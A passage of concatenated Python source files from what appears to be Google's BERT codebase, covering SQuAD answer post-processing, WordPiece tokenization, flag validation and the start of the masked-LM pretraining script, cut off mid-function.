min score of irrelevant if FLAGS.version_2_with_negative: feature_null_score = result.start_logits[0] + result.end_logits[0] if feature_null_score < score_null: score_null = feature_null_score min_null_feature_index = feature_index null_start_logit = result.start_logits[0] null_end_logit = result.end_logits[0] for start_index in start_indexes: for end_index in end_indexes: # We could hypothetically create invalid predictions, e.g., predict # that the start of the span is in the question. We throw out all # invalid predictions. 
if start_index >= len(feature.tokens): continue if end_index >= len(feature.tokens): continue if start_index not in feature.token_to_orig_map: continue if end_index not in feature.token_to_orig_map: continue if not feature.token_is_max_context.get(start_index, False): continue if end_index < start_index: continue length = end_index - start_index + 1 if length > max_answer_length: continue prelim_predictions.append( _PrelimPrediction( feature_index=feature_index, start_index=start_index, end_index=end_index, start_logit=result.start_logits[start_index], end_logit=result.end_logits[end_index])) if FLAGS.version_2_with_negative: prelim_predictions.append( _PrelimPrediction( feature_index=min_null_feature_index, start_index=0, end_index=0, start_logit=null_start_logit, end_logit=null_end_logit)) prelim_predictions = sorted( prelim_predictions, key=lambda x: (x.start_logit + x.end_logit), reverse=True) _NbestPrediction = collections.namedtuple( # pylint: disable=invalid-name "NbestPrediction", ["text", "start_logit", "end_logit"]) seen_predictions = {} nbest = [] for pred in prelim_predictions: if len(nbest) >= n_best_size: break feature = features[pred.feature_index] if pred.start_index > 0: # this is a non-null prediction tok_tokens = feature.tokens[pred.start_index:(pred.end_index + 1)] orig_doc_start = feature.token_to_orig_map[pred.start_index] orig_doc_end = feature.token_to_orig_map[pred.end_index] orig_tokens = example.doc_tokens[orig_doc_start:(orig_doc_end + 1)] tok_text = " ".join(tok_tokens) # De-tokenize WordPieces that have been split off. tok_text = tok_text.replace(" ##", "") tok_text = tok_text.replace("##", "") # Clean whitespace tok_text = tok_text.strip() tok_text = " ".join(tok_text.split()) orig_text = " ".join(orig_tokens) final_text = get_final_text(tok_text, orig_text, do_lower_case) if final_text in seen_predictions: continue seen_predictions[final_text] = True else: final_text = "" seen_predictions[final_text] = True nbest.append( _NbestPrediction( text=final_text, start_logit=pred.start_logit, end_logit=pred.end_logit)) # if we didn't inlude the empty option in the n-best, inlcude it if FLAGS.version_2_with_negative: if "" not in seen_predictions: nbest.append( _NbestPrediction( text="", start_logit=null_start_logit, end_logit=null_end_logit)) # In very rare edge cases we could have no valid predictions. So we # just create a nonce prediction in this case to avoid failure. 
if not nbest: nbest.append( _NbestPrediction(text="empty", start_logit=0.0, end_logit=0.0)) assert len(nbest) >= 1 total_scores = [] best_non_null_entry = None for entry in nbest: total_scores.append(entry.start_logit + entry.end_logit) if not best_non_null_entry: if entry.text: best_non_null_entry = entry probs = _compute_softmax(total_scores) nbest_json = [] for (i, entry) in enumerate(nbest): output = collections.OrderedDict() output["text"] = entry.text output["probability"] = probs[i] output["start_logit"] = entry.start_logit output["end_logit"] = entry.end_logit nbest_json.append(output) assert len(nbest_json) >= 1 if not FLAGS.version_2_with_negative: all_predictions[example.qas_id] = nbest_json[0]["text"] else: # predict "" iff the null score - the score of best non-null > threshold score_diff = score_null - best_non_null_entry.start_logit - ( best_non_null_entry.end_logit) scores_diff_json[example.qas_id] = score_diff if score_diff > FLAGS.null_score_diff_threshold: all_predictions[example.qas_id] = "" else: all_predictions[example.qas_id] = best_non_null_entry.text all_nbest_json[example.qas_id] = nbest_json with tf.gfile.GFile(output_prediction_file, "w") as writer: writer.write(json.dumps(all_predictions, indent=4) + "\n") with tf.gfile.GFile(output_nbest_file, "w") as writer: writer.write(json.dumps(all_nbest_json, indent=4) + "\n") if FLAGS.version_2_with_negative: with tf.gfile.GFile(output_null_log_odds_file, "w") as writer: writer.write(json.dumps(scores_diff_json, indent=4) + "\n") def get_final_text(pred_text, orig_text, do_lower_case): """Project the tokenized prediction back to the original text.""" # When we created the data, we kept track of the alignment between original # (whitespace tokenized) tokens and our WordPiece tokenized tokens. So # now `orig_text` contains the span of our original text corresponding to the # span that we predicted. # # However, `orig_text` may contain extra characters that we don't want in # our prediction. # # For example, let's say: # pred_text = steve smith # orig_text = Steve Smith's # # We don't want to return `orig_text` because it contains the extra "'s". # # We don't want to return `pred_text` because it's already been normalized # (the SQuAD eval script also does punctuation stripping/lower casing but # our tokenizer does additional normalization like stripping accent # characters). # # What we really want to return is "Steve Smith". # # Therefore, we have to apply a semi-complicated alignment heruistic between # `pred_text` and `orig_text` to get a character-to-charcter alignment. This # can fail in certain cases in which case we just return `orig_text`. def _strip_spaces(text): ns_chars = [] ns_to_s_map = collections.OrderedDict() for (i, c) in enumerate(text): if c == " ": continue ns_to_s_map[len(ns_chars)] = i ns_chars.append(c) ns_text = "".join(ns_chars) return (ns_text, ns_to_s_map) # We first tokenize `orig_text`, strip whitespace from the result # and `pred_text`, and check if they are the same length. If they are # NOT the same length, the heuristic has failed. If they are the same # length, we assume the characters are one-to-one aligned. 
tokenizer = tokenization.BasicTokenizer(do_lower_case=do_lower_case) tok_text = " ".join(tokenizer.tokenize(orig_text)) start_position = tok_text.find(pred_text) if start_position == -1: if FLAGS.verbose_logging: tf.logging.info( "Unable to find text: '%s' in '%s'" % (pred_text, orig_text)) return orig_text end_position = start_position + len(pred_text) - 1 (orig_ns_text, orig_ns_to_s_map) = _strip_spaces(orig_text) (tok_ns_text, tok_ns_to_s_map) = _strip_spaces(tok_text) if len(orig_ns_text) != len(tok_ns_text): if FLAGS.verbose_logging: tf.logging.info("Length not equal after stripping spaces: '%s' vs '%s'", orig_ns_text, tok_ns_text) return orig_text # We then project the characters in `pred_text` back to `orig_text` using # the character-to-character alignment. tok_s_to_ns_map = {} for (i, tok_index) in six.iteritems(tok_ns_to_s_map): tok_s_to_ns_map[tok_index] = i orig_start_position = None if start_position in tok_s_to_ns_map: ns_start_position = tok_s_to_ns_map[start_position] if ns_start_position in orig_ns_to_s_map: orig_start_position = orig_ns_to_s_map[ns_start_position] if orig_start_position is None: if FLAGS.verbose_logging: tf.logging.info("Couldn't map start position") return orig_text orig_end_position = None if end_position in tok_s_to_ns_map: ns_end_position = tok_s_to_ns_map[end_position] if ns_end_position in orig_ns_to_s_map: orig_end_position = orig_ns_to_s_map[ns_end_position] if orig_end_position is None: if FLAGS.verbose_logging: tf.logging.info("Couldn't map end position") return orig_text output_text = orig_text[orig_start_position:(orig_end_position + 1)] return output_text def _get_best_indexes(logits, n_best_size): """Get the n-best logits from a list.""" index_and_score = sorted(enumerate(logits), key=lambda x: x[1], reverse=True) best_indexes = [] for i in range(len(index_and_score)): if i >= n_best_size: break best_indexes.append(index_and_score[i][0]) return best_indexes def _compute_softmax(scores): """Compute softmax probability over raw logits.""" if not scores: return [] max_score = None for score in scores: if max_score is None or score > max_score: max_score = score exp_scores = [] total_sum = 0.0 for score in scores: x = math.exp(score - max_score) exp_scores.append(x) total_sum += x probs = [] for score in exp_scores: probs.append(score / total_sum) return probs class FeatureWriter(object): """Writes InputFeature to TF example file.""" def __init__(self, filename, is_training): self.filename = filename self.is_training = is_training self.num_features = 0 self._writer = tf.python_io.TFRecordWriter(filename) def process_feature(self, feature): """Write a InputFeature to the TFRecordWriter as a tf.train.Example.""" self.num_features += 1 def create_int_feature(values): feature = tf.train.Feature( int64_list=tf.train.Int64List(value=list(values))) return feature features = collections.OrderedDict() features["unique_ids"] = create_int_feature([feature.unique_id]) features["input_ids"] = create_int_feature(feature.input_ids) features["input_mask"] = create_int_feature(feature.input_mask) features["segment_ids"] = create_int_feature(feature.segment_ids) if self.is_training: features["start_positions"] = create_int_feature([feature.start_position]) features["end_positions"] = create_int_feature([feature.end_position]) impossible = 0 if feature.is_impossible: impossible = 1 features["is_impossible"] = create_int_feature([impossible]) tf_example = tf.train.Example(features=tf.train.Features(feature=features)) 
self._writer.write(tf_example.SerializeToString()) def close(self): self._writer.close() def validate_flags_or_throw(bert_config): """Validate the input FLAGS or throw an exception.""" tokenization.validate_case_matches_checkpoint(FLAGS.do_lower_case, FLAGS.init_checkpoint) if not FLAGS.do_train and not FLAGS.do_predict: raise ValueError("At least one of `do_train` or `do_predict` must be True.") if FLAGS.do_train: if not FLAGS.train_file: raise ValueError( "If `do_train` is True, then `train_file` must be specified.") if FLAGS.do_predict: if not FLAGS.predict_file: raise ValueError( "If `do_predict` is True, then `predict_file` must be specified.") if FLAGS.max_seq_length > bert_config.max_position_embeddings: raise ValueError( "Cannot use sequence length %d because the BERT model " "was only trained up to sequence length %d" % (FLAGS.max_seq_length, bert_config.max_position_embeddings)) if FLAGS.max_seq_length <= FLAGS.max_query_length + 3: raise ValueError( "The max_seq_length (%d) must be greater than max_query_length " "(%d) + 3" % (FLAGS.max_seq_length, FLAGS.max_query_length)) def main(_): tf.logging.set_verbosity(tf.logging.INFO) bert_config = modeling.BertConfig.from_json_file(FLAGS.bert_config_file) validate_flags_or_throw(bert_config) tf.gfile.MakeDirs(FLAGS.output_dir) tokenizer = tokenization.FullTokenizer( vocab_file=FLAGS.vocab_file, do_lower_case=FLAGS.do_lower_case) tpu_cluster_resolver = None if FLAGS.use_tpu and FLAGS.tpu_name: tpu_cluster_resolver = tf.contrib.cluster_resolver.TPUClusterResolver( FLAGS.tpu_name, zone=FLAGS.tpu_zone, project=FLAGS.gcp_project) is_per_host = tf.contrib.tpu.InputPipelineConfig.PER_HOST_V2 run_config = tf.contrib.tpu.RunConfig( cluster=tpu_cluster_resolver, master=FLAGS.master, model_dir=FLAGS.output_dir, save_checkpoints_steps=FLAGS.save_checkpoints_steps, tpu_config=tf.contrib.tpu.TPUConfig( iterations_per_loop=FLAGS.iterations_per_loop, num_shards=FLAGS.num_tpu_cores, per_host_input_for_training=is_per_host)) train_examples = None num_train_steps = None num_warmup_steps = None if FLAGS.do_train: train_examples = read_squad_examples( input_file=FLAGS.train_file, is_training=True) num_train_steps = int( len(train_examples) / FLAGS.train_batch_size * FLAGS.num_train_epochs) num_warmup_steps = int(num_train_steps * FLAGS.warmup_proportion) # Pre-shuffle the input to avoid having to make a very large shuffle # buffer in in the `input_fn`. rng = random.Random(12345) rng.shuffle(train_examples) model_fn = model_fn_builder( bert_config=bert_config, init_checkpoint=FLAGS.init_checkpoint, learning_rate=FLAGS.learning_rate, num_train_steps=num_train_steps, num_warmup_steps=num_warmup_steps, use_tpu=FLAGS.use_tpu, use_one_hot_embeddings=FLAGS.use_tpu) # If TPU is not available, this will fall back to normal Estimator on CPU # or GPU. estimator = tf.contrib.tpu.TPUEstimator( use_tpu=FLAGS.use_tpu, model_fn=model_fn, config=run_config, train_batch_size=FLAGS.train_batch_size, predict_batch_size=FLAGS.predict_batch_size) if FLAGS.do_train: # We write to a temporary file to avoid storing very large constant tensors # in memory. 
train_writer = FeatureWriter( filename=os.path.join(FLAGS.output_dir, "train.tf_record"), is_training=True) convert_examples_to_features( examples=train_examples, tokenizer=tokenizer, max_seq_length=FLAGS.max_seq_length, doc_stride=FLAGS.doc_stride, max_query_length=FLAGS.max_query_length, is_training=True, output_fn=train_writer.process_feature) train_writer.close() tf.logging.info("***** Running training *****") tf.logging.info(" Num orig examples = %d", len(train_examples)) tf.logging.info(" Num split examples = %d", train_writer.num_features) tf.logging.info(" Batch size = %d", FLAGS.train_batch_size) tf.logging.info(" Num steps = %d", num_train_steps) del train_examples train_input_fn = input_fn_builder( input_file=train_writer.filename, seq_length=FLAGS.max_seq_length, is_training=True, drop_remainder=True) estimator.train(input_fn=train_input_fn, max_steps=num_train_steps) if FLAGS.do_predict: eval_examples = read_squad_examples( input_file=FLAGS.predict_file, is_training=False) eval_writer = FeatureWriter( filename=os.path.join(FLAGS.output_dir, "eval.tf_record"), is_training=False) eval_features = [] def append_feature(feature): eval_features.append(feature) eval_writer.process_feature(feature) convert_examples_to_features( examples=eval_examples, tokenizer=tokenizer, max_seq_length=FLAGS.max_seq_length, doc_stride=FLAGS.doc_stride, max_query_length=FLAGS.max_query_length, is_training=False, output_fn=append_feature) eval_writer.close() tf.logging.info("***** Running predictions *****") tf.logging.info(" Num orig examples = %d", len(eval_examples)) tf.logging.info(" Num split examples = %d", len(eval_features)) tf.logging.info(" Batch size = %d", FLAGS.predict_batch_size) all_results = [] predict_input_fn = input_fn_builder( input_file=eval_writer.filename, seq_length=FLAGS.max_seq_length, is_training=False, drop_remainder=False) # If running eval on the TPU, you will need to specify the number of # steps. all_results = [] for result in estimator.predict( predict_input_fn, yield_single_examples=True): if len(all_results) % 1000 == 0: tf.logging.info("Processing example: %d" % (len(all_results))) unique_id = int(result["unique_ids"]) start_logits = [float(x) for x in result["start_logits"].flat] end_logits = [float(x) for x in result["end_logits"].flat] all_results.append( RawResult( unique_id=unique_id, start_logits=start_logits, end_logits=end_logits)) output_prediction_file = os.path.join(FLAGS.output_dir, "predictions.json") output_nbest_file = os.path.join(FLAGS.output_dir, "nbest_predictions.json") output_null_log_odds_file = os.path.join(FLAGS.output_dir, "null_odds.json") write_predictions(eval_examples, eval_features, all_results, FLAGS.n_best_size, FLAGS.max_answer_length, FLAGS.do_lower_case, output_prediction_file, output_nbest_file, output_null_log_odds_file) if __name__ == "__main__": flags.mark_flag_as_required("vocab_file") flags.mark_flag_as_required("bert_config_file") flags.mark_flag_as_required("output_dir") tf.app.run() File: __init__.py # coding=utf-8 # Copyright 2018 The Google AI Language Team Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
# See the License for the specific language governing permissions and # limitations under the License. File: tokenization.py # coding=utf-8 # Copyright 2018 The Google AI Language Team Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Tokenization classes.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import collections import re import unicodedata import six import tensorflow as tf def validate_case_matches_checkpoint(do_lower_case, init_checkpoint): """Checks whether the casing config is consistent with the checkpoint name.""" # The casing has to be passed in by the user and there is no explicit check # as to whether it matches the checkpoint. The casing information probably # should have been stored in the bert_config.json file, but it's not, so # we have to heuristically detect it to validate. if not init_checkpoint: return m = re.match("^.*?([A-Za-z0-9_-]+)/bert_model.ckpt", init_checkpoint) if m is None: return model_name = m.group(1) lower_models = [ "uncased_L-24_H-1024_A-16", "uncased_L-12_H-768_A-12", "multilingual_L-12_H-768_A-12", "chinese_L-12_H-768_A-12" ] cased_models = [ "cased_L-12_H-768_A-12", "cased_L-24_H-1024_A-16", "multi_cased_L-12_H-768_A-12" ] is_bad_config = False if model_name in lower_models and not do_lower_case: is_bad_config = True actual_flag = "False" case_name = "lowercased" opposite_flag = "True" if model_name in cased_models and do_lower_case: is_bad_config = True actual_flag = "True" case_name = "cased" opposite_flag = "False" if is_bad_config: raise ValueError( "You passed in `--do_lower_case=%s` with `--init_checkpoint=%s`. " "However, `%s` seems to be a %s model, so you " "should pass in `--do_lower_case=%s` so that the fine-tuning matches " "how the model was pre-training. If this error is wrong, please " "just comment out this check." % (actual_flag, init_checkpoint, model_name, case_name, opposite_flag)) def convert_to_unicode(text): """Converts `text` to Unicode (if it's not already), assuming utf-8 input.""" if six.PY3: if isinstance(text, str): return text elif isinstance(text, bytes): return text.decode("utf-8", "ignore") else: raise ValueError("Unsupported string type: %s" % (type(text))) elif six.PY2: if isinstance(text, str): return text.decode("utf-8", "ignore") elif isinstance(text, unicode): return text else: raise ValueError("Unsupported string type: %s" % (type(text))) else: raise ValueError("Not running on Python2 or Python 3?") def printable_text(text): """Returns text encoded in a way suitable for print or `tf.logging`.""" # These functions want `str` for both Python2 and Python3, but in one case # it's a Unicode string and in the other it's a byte string. 
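# In short: convert_to_unicode() above normalizes *inputs* to unicode text,
# while printable_text() returns whatever `str` means on the running
# interpreter (unicode on Python 3, UTF-8 encoded bytes on Python 2), which is
# why it is the helper used when formatting values for tf.logging messages.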
if six.PY3: if isinstance(text, str): return text elif isinstance(text, bytes): return text.decode("utf-8", "ignore") else: raise ValueError("Unsupported string type: %s" % (type(text))) elif six.PY2: if isinstance(text, str): return text elif isinstance(text, unicode): return text.encode("utf-8") else: raise ValueError("Unsupported string type: %s" % (type(text))) else: raise ValueError("Not running on Python2 or Python 3?") def load_vocab(vocab_file): """Loads a vocabulary file into a dictionary.""" vocab = collections.OrderedDict() index = 0 with tf.gfile.GFile(vocab_file, "r") as reader: while True: token = convert_to_unicode(reader.readline()) if not token: break token = token.strip() vocab[token] = index index += 1 return vocab def convert_by_vocab(vocab, items): """Converts a sequence of [tokens|ids] using the vocab.""" output = [] for item in items: output.append(vocab[item]) return output def convert_tokens_to_ids(vocab, tokens): return convert_by_vocab(vocab, tokens) def convert_ids_to_tokens(inv_vocab, ids): return convert_by_vocab(inv_vocab, ids) def whitespace_tokenize(text): """Runs basic whitespace cleaning and splitting on a piece of text.""" text = text.strip() if not text: return [] tokens = text.split() return tokens class FullTokenizer(object): """Runs end-to-end tokenziation.""" def __init__(self, vocab_file, do_lower_case=True): self.vocab = load_vocab(vocab_file) self.inv_vocab = {v: k for k, v in self.vocab.items()} self.basic_tokenizer = BasicTokenizer(do_lower_case=do_lower_case) self.wordpiece_tokenizer = WordpieceTokenizer(vocab=self.vocab) def tokenize(self, text): split_tokens = [] for token in self.basic_tokenizer.tokenize(text): for sub_token in self.wordpiece_tokenizer.tokenize(token): split_tokens.append(sub_token) return split_tokens def convert_tokens_to_ids(self, tokens): return convert_by_vocab(self.vocab, tokens) def convert_ids_to_tokens(self, ids): return convert_by_vocab(self.inv_vocab, ids) class BasicTokenizer(object): """Runs basic tokenization (punctuation splitting, lower casing, etc.).""" def __init__(self, do_lower_case=True): """Constructs a BasicTokenizer. Args: do_lower_case: Whether to lower case the input. """ self.do_lower_case = do_lower_case def tokenize(self, text): """Tokenizes a piece of text.""" text = convert_to_unicode(text) text = self._clean_text(text) # This was added on November 1st, 2018 for the multilingual and Chinese # models. This is also applied to the English models now, but it doesn't # matter since the English models were not trained on any Chinese data # and generally don't have any Chinese data in them (there are Chinese # characters in the vocabulary because Wikipedia does have some Chinese # words in the English Wikipedia.). 
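# Sketch of what tokenize() does to a string when do_lower_case=True (the
# input is hypothetical and only illustrates the steps that follow):
#   "HeLLo, 世界!" -> clean text -> pad CJK chars with spaces (next line)
#   -> whitespace split -> lowercase + strip accents -> split punctuation
#   -> ["hello", ",", "世", "界", "!"]
# WordPiece splitting happens later, in WordpieceTokenizer, not here.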
text = self._tokenize_chinese_chars(text) orig_tokens = whitespace_tokenize(text) split_tokens = [] for token in orig_tokens: if self.do_lower_case: token = token.lower() token = self._run_strip_accents(token) split_tokens.extend(self._run_split_on_punc(token)) output_tokens = whitespace_tokenize(" ".join(split_tokens)) return output_tokens def _run_strip_accents(self, text): """Strips accents from a piece of text.""" text = unicodedata.normalize("NFD", text) output = [] for char in text: cat = unicodedata.category(char) if cat == "Mn": continue output.append(char) return "".join(output) def _run_split_on_punc(self, text): """Splits punctuation on a piece of text.""" chars = list(text) i = 0 start_new_word = True output = [] while i < len(chars): char = chars[i] if _is_punctuation(char): output.append([char]) start_new_word = True else: if start_new_word: output.append([]) start_new_word = False output[-1].append(char) i += 1 return ["".join(x) for x in output] def _tokenize_chinese_chars(self, text): """Adds whitespace around any CJK character.""" output = [] for char in text: cp = ord(char) if self._is_chinese_char(cp): output.append(" ") output.append(char) output.append(" ") else: output.append(char) return "".join(output) def _is_chinese_char(self, cp): """Checks whether CP is the codepoint of a CJK character.""" # This defines a "chinese character" as anything in the CJK Unicode block: # https://en.wikipedia.org/wiki/CJK_Unified_Ideographs_(Unicode_block) # # Note that the CJK Unicode block is NOT all Japanese and Korean characters, # despite its name. The modern Korean Hangul alphabet is a different block, # as is Japanese Hiragana and Katakana. Those alphabets are used to write # space-separated words, so they are not treated specially and handled # like the all of the other languages. if ((cp >= 0x4E00 and cp <= 0x9FFF) or # (cp >= 0x3400 and cp <= 0x4DBF) or # (cp >= 0x20000 and cp <= 0x2A6DF) or # (cp >= 0x2A700 and cp <= 0x2B73F) or # (cp >= 0x2B740 and cp <= 0x2B81F) or # (cp >= 0x2B820 and cp <= 0x2CEAF) or (cp >= 0xF900 and cp <= 0xFAFF) or # (cp >= 0x2F800 and cp <= 0x2FA1F)): # return True return False def _clean_text(self, text): """Performs invalid character removal and whitespace cleanup on text.""" output = [] for char in text: cp = ord(char) if cp == 0 or cp == 0xfffd or _is_control(char): continue if _is_whitespace(char): output.append(" ") else: output.append(char) return "".join(output) class WordpieceTokenizer(object): """Runs WordPiece tokenziation.""" def __init__(self, vocab, unk_token="[UNK]", max_input_chars_per_word=200): self.vocab = vocab self.unk_token = unk_token self.max_input_chars_per_word = max_input_chars_per_word def tokenize(self, text): """Tokenizes a piece of text into its word pieces. This uses a greedy longest-match-first algorithm to perform tokenization using the given vocabulary. For example: input = "unaffable" output = ["un", "##aff", "##able"] Args: text: A single token or whitespace separated tokens. This should have already been passed through `BasicTokenizer. Returns: A list of wordpiece tokens. 
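    Note (illustrative): the loop below is greedy longest-match-first. It
    repeatedly takes the longest prefix of the remaining characters that is in
    the vocab, prefixes non-initial pieces with "##", and if some remainder
    cannot be matched at all, the whole token is replaced by `unk_token`
    rather than being partially tokenized.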
""" text = convert_to_unicode(text) output_tokens = [] for token in whitespace_tokenize(text): chars = list(token) if len(chars) > self.max_input_chars_per_word: output_tokens.append(self.unk_token) continue is_bad = False start = 0 sub_tokens = [] while start < len(chars): end = len(chars) cur_substr = None while start < end: substr = "".join(chars[start:end]) if start > 0: substr = "##" + substr if substr in self.vocab: cur_substr = substr break end -= 1 if cur_substr is None: is_bad = True break sub_tokens.append(cur_substr) start = end if is_bad: output_tokens.append(self.unk_token) else: output_tokens.extend(sub_tokens) return output_tokens def _is_whitespace(char): """Checks whether `chars` is a whitespace character.""" # \t, \n, and \r are technically contorl characters but we treat them # as whitespace since they are generally considered as such. if char == " " or char == "\t" or char == "\n" or char == "\r": return True cat = unicodedata.category(char) if cat == "Zs": return True return False def _is_control(char): """Checks whether `chars` is a control character.""" # These are technically control characters but we count them as whitespace # characters. if char == "\t" or char == "\n" or char == "\r": return False cat = unicodedata.category(char) if cat in ("Cc", "Cf"): return True return False def _is_punctuation(char): """Checks whether `chars` is a punctuation character.""" cp = ord(char) # We treat all non-letter/number ASCII as punctuation. # Characters such as "^", "$", and "`" are not in the Unicode # Punctuation class but we treat them as punctuation anyways, for # consistency. if ((cp >= 33 and cp <= 47) or (cp >= 58 and cp <= 64) or (cp >= 91 and cp <= 96) or (cp >= 123 and cp <= 126)): return True cat = unicodedata.category(char) if cat.startswith("P"): return True return False File: run_pretraining.py # coding=utf-8 # Copyright 2018 The Google AI Language Team Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Run masked LM/next sentence masked_lm pre-training for BERT.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import os import modeling import optimization import tensorflow as tf flags = tf.flags FLAGS = flags.FLAGS ## Required parameters flags.DEFINE_string( "bert_config_file", None, "The config json file corresponding to the pre-trained BERT model. " "This specifies the model architecture.") flags.DEFINE_string( "input_file", None, "Input TF example files (can be a glob or comma separated).") flags.DEFINE_string( "output_dir", None, "The output directory where the model checkpoints will be written.") ## Other parameters flags.DEFINE_string( "init_checkpoint", None, "Initial checkpoint (usually from a pre-trained BERT model).") flags.DEFINE_integer( "max_seq_length", 128, "The maximum total input sequence length after WordPiece tokenization. " "Sequences longer than this will be truncated, and sequences shorter " "than this will be padded. 
Must match data generation.") flags.DEFINE_integer( "max_predictions_per_seq", 20, "Maximum number of masked LM predictions per sequence. " "Must match data generation.") flags.DEFINE_bool("do_train", False, "Whether to run training.") flags.DEFINE_bool("do_eval", False, "Whether to run eval on the dev set.") flags.DEFINE_integer("train_batch_size", 32, "Total batch size for training.") flags.DEFINE_integer("eval_batch_size", 8, "Total batch size for eval.") flags.DEFINE_float("learning_rate", 5e-5, "The initial learning rate for Adam.") flags.DEFINE_integer("num_train_steps", 100000, "Number of training steps.") flags.DEFINE_integer("num_warmup_steps", 10000, "Number of warmup steps.") flags.DEFINE_integer("save_checkpoints_steps", 1000, "How often to save the model checkpoint.") flags.DEFINE_integer("iterations_per_loop", 1000, "How many steps to make in each estimator call.") flags.DEFINE_integer("max_eval_steps", 100, "Maximum number of eval steps.") flags.DEFINE_bool("use_tpu", False, "Whether to use TPU or GPU/CPU.") tf.flags.DEFINE_string( "tpu_name", None, "The Cloud TPU to use for training. This should be either the name " "used when creating the Cloud TPU, or a grpc://ip.address.of.tpu:8470 " "url.") tf.flags.DEFINE_string( "tpu_zone", None, "[Optional] GCE zone where the Cloud TPU is located in. If not " "specified, we will attempt to automatically detect the GCE project from " "metadata.") tf.flags.DEFINE_string( "gcp_project", None, "[Optional] Project name for the Cloud TPU-enabled project. If not " "specified, we will attempt to automatically detect the GCE project from " "metadata.") tf.flags.DEFINE_string("master", None, "[Optional] TensorFlow master URL.") flags.DEFINE_integer( "num_tpu_cores", 8, "Only used if `use_tpu` is True. Total number of TPU cores to use.") def model_fn_builder(bert_config, init_checkpoint, learning_rate, num_train_steps, num_warmup_steps, use_tpu, use_one_hot_embeddings): """Returns `model_fn` closure for TPUEstimator.""" def model_fn(features, labels, mode, params): # pylint: disable=unused-argument """The `model_fn` for TPUEstimator.""" tf.logging.info("*** Features ***") for name in sorted(features.keys()): tf.logging.info(" name = %s, shape = %s" % (name, features[name].shape)) input_ids = features["input_ids"] input_mask = features["input_mask"] segment_ids = features["segment_ids"] masked_lm_positions = features["masked_lm_positions"] masked_lm_ids = features["masked_lm_ids"] masked_lm_weights = features["masked_lm_weights"] next_sentence_labels = features["next_sentence_labels"] is_training = (mode == tf.estimator.ModeKeys.TRAIN) model = modeling.BertModel( config=bert_config, is_training=is_training, input_ids=input_ids, input_mask=input_mask, token_type_ids=segment_ids, use_one_hot_embeddings=use_one_hot_embeddings) (masked_lm_loss, masked_lm_example_loss, masked_lm_log_probs) = get_masked_lm_output( bert_config, model.get_sequence_output(), model.get_embedding_table(), masked_lm_positions, masked_lm_ids, masked_lm_weights) (next_sentence_loss, next_sentence_example_loss, next_sentence_log_probs) = get_next_sentence_output( bert_config, model.get_pooled_output(), next_sentence_labels) total_loss = masked_lm_loss + next_sentence_loss tvars = tf.trainable_variables() initialized_variable_names = {} scaffold_fn = None if init_checkpoint: (assignment_map, initialized_variable_names ) = modeling.get_assignment_map_from_checkpoint(tvars, init_checkpoint) if use_tpu: def tpu_scaffold(): tf.train.init_from_checkpoint(init_checkpoint, 
assignment_map) return tf.train.Scaffold() scaffold_fn = tpu_scaffold else: tf.train.init_from_checkpoint(init_checkpoint, assignment_map) tf.logging.info("**** Trainable Variables ****") for var in tvars: init_string = "" if var.name in initialized_variable_names: init_string = ", *INIT_FROM_CKPT*" tf.logging.info(" name = %s, shape = %s%s", var.name, var.shape, init_string) output_spec = None if mode == tf.estimator.ModeKeys.TRAIN: train_op = optimization.create_optimizer( total_loss, learning_rate, num_train_steps, num_warmup_steps, use_tpu) output_spec = tf.contrib.tpu.TPUEstimatorSpec( mode=mode, loss=total_loss, train_op=train_op, scaffold_fn=scaffold_fn) elif mode == tf.estimator.ModeKeys.EVAL: def metric_fn(masked_lm_example_loss, masked_lm_log_probs, masked_lm_ids, masked_lm_weights, next_sentence_example_loss, next_sentence_log_probs, next_sentence_labels): """Computes the loss and accuracy of the model.""" masked_lm_log_probs = tf.reshape(masked_lm_log_probs, [-1, masked_lm_log_probs.shape[-1]]) masked_lm_predictions = tf.argmax( masked_lm_log_probs, axis=-1, output_type=tf.int32) masked_lm_example_loss = tf.reshape(masked_lm_example_loss, [-1]) masked_lm_ids = tf.reshape(masked_lm_ids, [-1]) masked_lm_weights = tf.reshape(masked_lm_weights, [-1]) masked_lm_accuracy = tf.metrics.accuracy( labels=masked_lm_ids, predictions=masked_lm_predictions, weights=masked_lm_weights) masked_lm_mean_loss = tf.metrics.mean( values=masked_lm_example_loss, weights=masked_lm_weights) next_sentence_log_probs = tf.reshape( next_sentence_log_probs, [-1, next_sentence_log_probs.shape[-1]]) next_sentence_predictions = tf.argmax( next_sentence_log_probs, axis=-1, output_type=tf.int32) next_sentence_labels = tf.reshape(next_sentence_labels, [-1]) next_sentence_accuracy = tf.metrics.accuracy( labels=next_sentence_labels, predictions=next_sentence_predictions) next_sentence_mean_loss = tf.metrics.mean( values=next_sentence_example_loss) return { "masked_lm_accuracy": masked_lm_accuracy, "masked_lm_loss": masked_lm_mean_loss, "next_sentence_accuracy": next_sentence_accuracy, "next_sentence_loss": next_sentence_mean_loss, } eval_metrics = (metric_fn, [ masked_lm_example_loss, masked_lm_log_probs, masked_lm_ids, masked_lm_weights, next_sentence_example_loss, next_sentence_log_probs, next_sentence_labels ]) output_spec = tf.contrib.tpu.TPUEstimatorSpec( mode=mode, loss=total_loss, eval_metrics=eval_metrics, scaffold_fn=scaffold_fn) else: raise ValueError("Only TRAIN and EVAL modes are supported: %s" % (mode)) return output_spec return model_fn def get_masked_lm_output(bert_config, input_tensor, output_weights, positions, label_ids, label_weights): """Get loss and log probs for the masked LM.""" input_tensor = gather_indexes(input_tensor, positions) with tf.variable_scope("cls/predictions"): # We apply one more non-linear 